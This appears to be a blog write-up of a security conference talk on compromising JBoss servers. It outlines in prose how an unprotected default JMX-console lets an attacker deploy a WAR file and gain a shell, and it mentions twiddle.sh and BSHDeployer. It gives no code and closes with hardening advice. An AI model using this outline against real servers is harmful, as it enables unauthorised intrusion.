Last presentation on the planning: Patrick Hof and Jens Liebchen, from Redteam Pentesting, presented slides about JBoss and its configuration. The goal was to explain how to exploit a JBoss server and got a shell on the server. They got it! Jboss is based on a complex architecture and is widely used. It means: “widely used + complex structure + used in enterprises = good target”. To perform code execution on JBoss, they deployed a WAR file (Web application ARchive). How? By using the JMX-console. By default, this console is NOT protected! Scaring for a product used by so much organizations! Here is a link to the same kind of exploit. Other tools used were twiddle.sh and BSHDeployer. They demonstrated that even placed behind a firewall, a JBoss server is still vulnerable to code execution.
Conclusions? Once a gain internal security is required! Most companies think they are protected by their [firewall|ids|ips|reverse-proxies|…] but what about internal threats? And finally, do NOT run any software with an out-of-the-box configuration. Review security settings and fix them according to your security policy!
That’s all for today! See you tomorrow for more presentations!